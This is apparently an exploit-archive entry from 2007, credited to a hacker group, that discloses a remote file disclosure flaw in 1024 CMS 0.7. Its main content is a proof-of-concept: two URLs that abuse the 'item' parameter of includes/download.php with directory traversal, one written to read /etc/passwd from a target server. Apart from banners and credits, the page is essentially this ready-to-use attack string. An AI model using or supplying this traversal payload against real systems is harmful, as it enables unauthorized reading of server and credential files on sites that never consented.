[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 1024 CMS 0.7 (download.php item) Remote File Disclosure Vulnerability
# Published : 2007-05-02
# Author : Dj7xpl
# Previous Title : PStruh-CZ 1.3/1.5 (download.asp File) File Disclosure Vulnerability
# Next Title : YaPIG 0.95b Remote Code Execution Exploit
#'#/
(-.-)
--------------------oOO---(_)---OOo-------------------
| [ Y! Underground Group ] |
| [ www.dj7xpl.2600.ir ] |
| [ Dj7xpl @ 2600.ir ] |
------------------------------------------------------
<--------------------------------------------------------------------------------------------------------------------->
[!] Portal : 1024 CMS Version 0.7
[!] Vendor : http://www.treble.lfhost.com
[!] Author : Dj7xpl
[!] Type : Remote File Disclosure Vuln
[!] We Are : Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me
<--------------------------------------------------------------------------------------------------------------------->
<--------------------------------------------------------------------------------------------------------------------->
PoC :
http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd
<--------------------------------------------------------------------------------------------------------------------->
# www.Syue.com [2007-05-02]